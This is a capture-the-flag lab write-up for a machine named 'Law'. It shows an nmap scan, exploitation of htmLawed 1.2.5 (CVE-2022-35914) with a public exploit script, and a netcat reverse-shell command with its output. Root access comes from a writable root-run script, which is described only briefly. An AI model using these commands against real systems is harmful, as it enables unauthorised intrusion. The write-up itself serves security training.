Law

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.158.190
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-11 14:18 +08
Nmap scan report for 192.168.158.190
Host is up (0.0086s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: htmLawed (1.2.5) test
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds

Initial Access

Port 80

There is a website that is running on port 80.

Upon inspection, we can see that the website is running on HTMLAWED 1.2.5.

CVE-2022-35914

Further searching online, give us this result.

htmlLawed 1.2.5 - Remote Code Execution (RCE)Exploit Database

We will run the exploit as follows to trigger the reverse shell.

┌──(ranay㉿kali)-[~/Desktop/PG/law]
└─$ bash 52023.sh -u http://192.168.158.190 -c 'nc 192.168.45.196 4445 -e /bin/bash' 
  ______     _______     ____   ___ ____  ____      _________  ___  _ _  _
 / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ / ___|/ _ \/ | || |
| |    \ \ / /|  _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_
| |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__   _|
 \____|  \_/  |_____|   |_____|\___/_____|_____|   |____/____/  /_/|_|  |_|

[+] Command output:

After running the exploit, we are able to get the reverse shell.

┌──(ranay㉿kali)-[~/Desktop]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.158.190] 49662
whoami
www-data
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@law:/var/www/html$ ^Z
zsh: suspended  nc -nlvp 4444
                                                                                                                                                                                                                  
┌──(ranay㉿kali)-[~/Desktop]
└─$ stty raw -echo; fg     
[1]  + continued  nc -nlvp 4444
                               reset
reset: unknown terminal type unknown
Terminal type? screen































www-data@law:/var/www/html$ whoami
www-data

Privilege Escalation

Exploiting script used by root

We will see if root is running any hidden process regularly using pspy.

When we go to that folder, we can see that we have access to modify the file for that bash file.

After modifying the file to add the reverse shell payload, we are able to get a reverse shell as root.